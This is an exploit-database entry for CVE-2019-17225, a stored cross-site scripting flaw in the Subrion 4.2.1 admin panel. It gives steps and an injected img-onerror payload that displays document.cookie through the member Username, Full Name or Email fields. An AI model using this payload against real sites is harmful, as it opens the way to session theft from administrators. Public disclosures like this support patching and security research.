Lucene search

K
exploitpackCreatigonEXPLOITPACK:EE79AA06B19DD30C3A277869A2AA02AC
HistoryOct 07, 2019 - 12:00 a.m.

Subrion 4.2.1 - Email Persistant Cross-Site Scripting

2019-10-0700:00:00
Creatigon
25

EPSS

0.001

Percentile

36.5%

Subrion 4.2.1 - Email Persistant Cross-Site Scripting

# Title: Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting
# Date: 2019-10-07
# Author: Min Ko Ko (Creatigon)
# Vendor Homepage: https://subrion.org/
# CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225
# Website : https://l33thacker.com
# Description :  Allows XSS via the panel/members/ Username, Full Name, or
# Email field, aka an "Admin Member JSON Update" issue.

First login the panel with user credential, Go to member tag from left menu.

http://localhost/panel/members/

Username, Full Name, Email are editable with double click on it. Insert the
following payload

<img src=x onerror=alert(document.cookie)>

EPSS

0.001

Percentile

36.5%

Related for EXPLOITPACK:EE79AA06B19DD30C3A277869A2AA02AC